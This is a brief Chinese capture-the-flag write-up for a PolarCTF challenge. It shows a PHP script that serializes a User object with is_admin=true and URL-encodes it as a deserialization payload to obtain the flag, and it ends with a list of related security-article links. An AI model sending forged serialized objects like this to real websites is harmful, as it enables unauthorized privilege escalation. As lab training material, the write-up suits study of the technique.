根据提示大概率是PHP反序列化,其中需要is_admin=true
<?php
class User{
public $is_admin=true;
}
$a = new User();
echo urlencode(serialize($a));
?>
然后将payload传送给网站,得到flag
【PolarCTF】投喂
大方子2026-06-02 8:53
相关推荐
安当加密03011 小时前
等保2.0三级数据库加密:2026检查清单 + TDE部署实战(附脚本)世界尽头与你2 小时前
Spring Boot Watcher 未授权访问漏洞X7x514 小时前
安全信息和事件管理(SIEM):企业安全运营的技术基石宋浮檀s14 小时前
应急响应——Web漏洞:命令执行+SSRF+弱口令~央千澈~16 小时前
《ZAKU渗透论:卓伊凡的2026渗透工程》第四章:Web攻击原理(下)——XSS、CSRF、文件上传漏洞weixin_3077791317 小时前
面向高性能保密计算的定制 Linux 系统构建与自动部署方案XLYcmy20 小时前
面向Agent权限系统的快速审计工具沈千秋.21 小时前
thinkphp5.2反序列化m0_738120721 天前
渗透测试基础——黑盒测试下的Web漏洞挖掘与利用解析(二)